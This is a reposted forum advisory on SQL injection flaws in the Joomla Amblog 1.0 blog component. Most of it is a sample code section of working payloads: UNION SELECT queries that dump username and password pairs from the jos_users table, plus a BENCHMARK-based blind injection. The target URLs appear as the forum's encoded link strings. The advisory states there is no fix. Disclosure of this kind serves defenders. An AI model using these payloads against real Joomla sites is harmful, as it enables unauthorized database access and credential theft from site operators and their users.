-
-
[转帖][推荐]Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities
-
发表于: 2010-8-11 12:19 2085
-
[转帖][推荐]Joomla Component Amblog 1.0 Multiple SQL Injection Vulnerabilities
2010-8-11 12:19
2085
Name Amblog
Vendor d89K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0G2j5X3W2@1j5Y4c8Q4x3X3g2Z5N6g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Versions Affected 1.0
Vendor d89K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0G2j5X3W2@1j5Y4c8Q4x3X3g2Z5N6g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Versions Affected 1.0
X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ Amblog is a simple blog engine for Joomla CMS. II. DESCRIPTION _______________ Some parameters are not properly sanitised before being used in SQL queries. III. ANALYSIS _____________ Summary: A) Multiple SQL Injection B) Multiple Blind SQL Injection A) Multiple SQL Injection _________________________ Some parameters, such as articleid and catid, are not properly sanitised before being used in SQL queries.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. B) Multiple Blind SQL Injection _________________________ The articleid parameter is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. IV. SAMPLE CODE _______________ A) Multiple SQL Injection e75K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6$3K9h3g2%4i4K6y4p5j5h3#2T1L8r3!0Y4i4K6t1$3j5$3q4@1K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT @@version e78K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5j5i4u0@1K9h3y4D9k6g2)9J5y4X3q4J5N6r3W2U0L8r3g2A6k6q4)9K6c8q4)9J5k6o6p5`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users 07aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5L8X3g2%4k6X3!0J5L8g2)9J5y4X3y4S2N6r3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users 4adK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6r3k6G2M7X3#2Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users e86K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6r3y4G2L8h3#2W2L8Y4c8X3L8%4u0E0i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users d0fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5M7$3q4$3k6h3&6W2N6$3y4G2L8h3#2W2L8Y4c8Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users b75K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5M7$3q4$3k6h3g2V1K9i4c8U0L8$3#2E0k6h3&6@1i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users B) Multiple Blind SQL Injection b84K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6h3c8A6N6s2y4S2N6X3g2Q4x3U0k6S2M7Y4c8A6j5$3I4W2K9h3c8Q4x3@1c8Q4x3X3b7I4 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) c44K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6S2L8h3u0D9L8$3N6Q4x3U0k6@1j5i4y4C8i4K6y4p5k6r3g2D9k6i4c8W2i4K6t1$3j5i4u0@1K9h3y4D9k6h3W2V1i4K6y4p5i4K6u0V1x3b7`.`. OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) V. FIX ______ No fix.
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
赞赏
雪币:
留言: